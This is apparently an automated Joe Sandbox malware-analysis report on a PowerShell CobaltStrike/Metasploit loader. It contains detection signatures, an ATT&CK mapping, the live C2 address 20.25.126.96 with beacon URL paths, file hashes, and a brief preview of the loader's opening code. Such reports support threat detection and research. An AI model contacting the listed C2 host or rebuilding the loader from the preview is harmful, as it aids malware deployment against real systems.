Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED3624C8 DeleteCriticalSection,SetUnhandledExceptionFilter,		0_2_000001A6ED3624C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED3624D0 RtlCaptureContext,SetUnhandledExceptionFilter,		0_2_000001A6ED3624D0

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED34DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_000001A6ED34DF50

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED34DEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_000001A6ED34DEC8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED340920 CreateNamedPipeA,

0_2_000001A6ED340920

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED3622A0 ReadFile,GetLocalTime,

0_2_000001A6ED3622A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED34B47C malloc,GetComputerNameExA,GetComputerNameA,GetUserNameA,malloc,

0_2_000001A6ED34B47C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED3621A8 GetVersionExA,

0_2_000001A6ED3621A8

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR
Source: Yara match	File source: 0.2.powershell.exe.1a6ed2e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.powershell.exe.1a6ed2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.powershell.exe.1a6ed330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.powershell.exe.1a6ed330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected MetasploitPayload

Source: Yara match	File source: oEFrY6Xcyl.ps1, type: SAMPLE
Source: Yara match	File source: amsi64_2820.amsi.csv, type: OTHER
Source: Yara match	File source: 00000000.00000002.4602998708.000001A6ED0B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4595950980.000001A6E4B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2820, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED346A78 socket,htons,ioctlsocket,closesocket,bind,listen,	0_2_000001A6ED346A78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED34EE8C socket,closesocket,htons,bind,listen,	0_2_000001A6ED34EE8C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED346670 htonl,htons,socket,closesocket,bind,ioctlsocket,	0_2_000001A6ED346670

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	2 Valid Accounts	2 Valid Accounts	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	22 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Access Token Manipulation	2 Valid Accounts	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Process Injection	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	21 Access Token Manipulation	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	3 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	13 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
oEFrY6Xcyl.ps1	66%	ReversingLabs	Script-PowerShell.Trojan.CobaltStrike
oEFrY6Xcyl.ps1	100%	Avira	TR/Coblat.G1

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
20.25.126.96	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4601032571.000001A6ECC91000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://20.25.126.96/cmW	powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://20.25.126.96/j	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/cm=	powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/m	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/cm;	powershell.exe, 00000000.00000002.4601032571.000001A6ECCFB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.4580368839.000001A6D4D39000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/ngs	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/cm5.126.96/cm	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/cmv	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/ms2	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/cmw	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/cmq	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://20.25.126.96/cms	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.4580368839.000001A6D4B11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://20.25.126.96/ms	powershell.exe, 00000000.00000002.4602674229.000001A6ECFBB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/cmf	powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1:%u/	powershell.exe, 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.4580368839.000001A6D4B11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://20.25.126.96/cm	powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4601032571.000001A6ECC91000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/?	powershell.exe, 00000000.00000002.4602030423.000001A6ECEFD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://20.25.126.96/cmd	powershell.exe, 00000000.00000002.4602030423.000001A6ECEB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
20.25.126.96	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542798
Start date and time:	2024-10-26 13:42:37 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	oEFrY6Xcyl.ps1 renamed because original name is a hash value
Original Sample Name:	225e88d982bb204ca48d3e7e2999e0b651dbf8d51d23840e142e6df7426548b2.ps1
Detection:	MAL
Classification:	mal100.troj.evad.winPS1@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 10 Number of non-executed functions: 182
Cookbook Comments:	Found application associated with file extension: .ps1 Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: oEFrY6Xcyl.ps1

Simulations

Behavior and APIs

Time	Type	Description
07:43:31	API Interceptor	130x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
20.25.126.96	m8K9cEQFa1.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse
	foEIrd5DlF.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse
	5Cw7877KPD.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse
	6GUgc6JYS1.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse
	J4o8OaYTEF.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse
	rSJj3YS2J1.exe	Get hash	malicious	CobaltStrike	Browse
	HvREKnuoh7.exe	Get hash	malicious	CobaltStrike	Browse
	foEIrd5DlF.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse
	VBqmdl6ttr.exe	Get hash	malicious	CobaltStrike	Browse
	IhmhW5dP4s.exe	Get hash	malicious	CobaltStrike	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	m8K9cEQFa1.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse	20.25.126.96
	foEIrd5DlF.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	20.25.126.96
	5Cw7877KPD.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse	20.25.126.96
	6GUgc6JYS1.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	20.25.126.96
	J4o8OaYTEF.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse	20.25.126.96
	rSJj3YS2J1.exe	Get hash	malicious	CobaltStrike	Browse	20.25.126.96
	HvREKnuoh7.exe	Get hash	malicious	CobaltStrike	Browse	20.25.126.96
	foEIrd5DlF.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	20.25.126.96
	VBqmdl6ttr.exe	Get hash	malicious	CobaltStrike	Browse	20.25.126.96
	IhmhW5dP4s.exe	Get hash	malicious	CobaltStrike	Browse	20.25.126.96

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz4awws3.543.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u31gyipb.z3t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.725266633029642
Encrypted:	false
SSDEEP:	96:YaH6p+3CnWTXkvhkvCCtG7p0Y6a+HN7p0Y6amHM:YG1PG7pC7ph
MD5:	3A239873E99A39749E0F3496D0631E0C
SHA1:	73D638C0FF7EB140E21BECD87DEC5E9C4CE5C5BF
SHA-256:	63265127B5A044CD0F24B30773B2E726459C28BC2F6848D11650294333CBA89E
SHA-512:	D0B06AAC6F4839871D55F459B56CE68E1BB2AAC330225CF4A2CCB0539D9495CD9A7804E690E90FB56BBCD8C26BBAF8DAEA15628847EEC275A402086607863ABA
Malicious:	false
Reputation:	low
Preview:	...................................FL..................F.".. ...J.S.....TF.'..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S......B.'...._F.'......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2ZYm]...........................^.A.p.p.D.a.t.a...B.V.1.....ZYk]..Roaming.@......EW<2ZYk]..../.......................T.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2ZYh]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2ZYh]....2.......................r.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2ZYh]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2ZYh]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2ZYo]....u...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G9P8OZBN16ZF2GF28T7C.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.725266633029642
Encrypted:	false
SSDEEP:	96:YaH6p+3CnWTXkvhkvCCtG7p0Y6a+HN7p0Y6amHM:YG1PG7pC7ph
MD5:	3A239873E99A39749E0F3496D0631E0C
SHA1:	73D638C0FF7EB140E21BECD87DEC5E9C4CE5C5BF
SHA-256:	63265127B5A044CD0F24B30773B2E726459C28BC2F6848D11650294333CBA89E
SHA-512:	D0B06AAC6F4839871D55F459B56CE68E1BB2AAC330225CF4A2CCB0539D9495CD9A7804E690E90FB56BBCD8C26BBAF8DAEA15628847EEC275A402086607863ABA
Malicious:	false
Reputation:	low
Preview:	...................................FL..................F.".. ...J.S.....TF.'..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S......B.'...._F.'......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2ZYm]...........................^.A.p.p.D.a.t.a...B.V.1.....ZYk]..Roaming.@......EW<2ZYk]..../.......................T.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2ZYh]....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2ZYh]....2.......................r.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2ZYh]....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2ZYh]....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2ZYo]....u...........

Static File Info

General

File type:	ASCII text, with very long lines (63904), with CRLF line terminators
Entropy (8bit):	5.736611691300354
TrID:
File name:	oEFrY6Xcyl.ps1
File size:	411'912 bytes
MD5:	bcb86f9d27c31bae83ab47c9f970ca98
SHA1:	2828cf58872227589f46595101d6129ced8334ab
SHA256:	225e88d982bb204ca48d3e7e2999e0b651dbf8d51d23840e142e6df7426548b2
SHA512:	6bdea040a28f1657d8f5ef2f356f623cc972d62bd0362a9e32efc35215a93c59224e940933106da6672bfb5f54f1ba2a5ba18302619781e5a280a3967b1a142e
SSDEEP:	6144:GgCjcsyEG7zWks4bOXwllEz1/IxinHDwAJ5cENmTqo84247UdndFmkgC56LsQ2lU:GgC4sdGvWAqXqcVIonHFJqEs8f7rL8
TLSH:	E0947C473F59A9AED612F122EA2EB0C235E4B52E91A58AC4B7F1D4F514F802134F43E7
File Content Preview:	Set-StrictMode -Version 2....function test {...Param ($var_module, $var_procedure).....$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-26T13:43:35.032958+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49710	20.25.126.96	443	TCP
2024-10-26T13:43:37.982753+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49714	20.25.126.96	443	TCP
2024-10-26T13:43:40.677125+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49728	20.25.126.96	443	TCP
2024-10-26T13:43:43.356490+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49750	20.25.126.96	443	TCP
2024-10-26T13:43:46.008163+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49764	20.25.126.96	443	TCP
2024-10-26T13:43:48.722575+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49783	20.25.126.96	443	TCP
2024-10-26T13:43:51.454786+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49793	20.25.126.96	443	TCP
2024-10-26T13:43:54.168915+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49801	20.25.126.96	443	TCP
2024-10-26T13:43:56.852102+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49808	20.25.126.96	443	TCP
2024-10-26T13:43:59.563189+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49814	20.25.126.96	443	TCP
2024-10-26T13:44:02.219634+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	49820	20.25.126.96	443	TCP
